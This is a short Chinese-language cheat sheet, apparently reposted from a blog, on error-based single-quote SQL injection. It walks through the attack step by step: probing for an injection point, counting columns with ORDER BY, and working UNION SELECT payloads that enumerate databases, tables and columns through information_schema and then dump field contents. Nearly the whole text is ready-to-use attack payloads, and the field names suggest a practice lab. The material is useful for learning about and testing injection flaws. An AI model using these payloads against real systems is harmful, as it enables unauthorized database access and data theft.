查找注入点
在url中:
1. ‘
2. and 1=1/and 1=2
3. 随即输入(整形)
4. -1/+1回显上下页面(整形)
5. and sleep(5) (判断页面返回时间)
判断有多少列
order by .....
爆显示位:
id=88888888‘) union select 1,2,3 --+
先获取数据库:
id=‘) union select 1,2,group_concat(distinct+table_schema) from information_schema.columns --+
再获取数据库的所有表:
id=‘) union select 1,2,group_concat(distinct+table_name) from information_schema.columns where table_schema=‘库名‘ --+
再获取表中的字段:
id=‘) union select 1,2,group_concat(distinct+column_name) from information_schema. columns where table_name=‘表名‘ --+
再获取字段信息:
id=‘) union select 1,2,group_concat(id,sessid,secret_EXS6,tryy) from 库名.表名--+
sql注入基于错误-单引号-字符型
原文:http://www.cnblogs.com/sky--/p/5761748.html
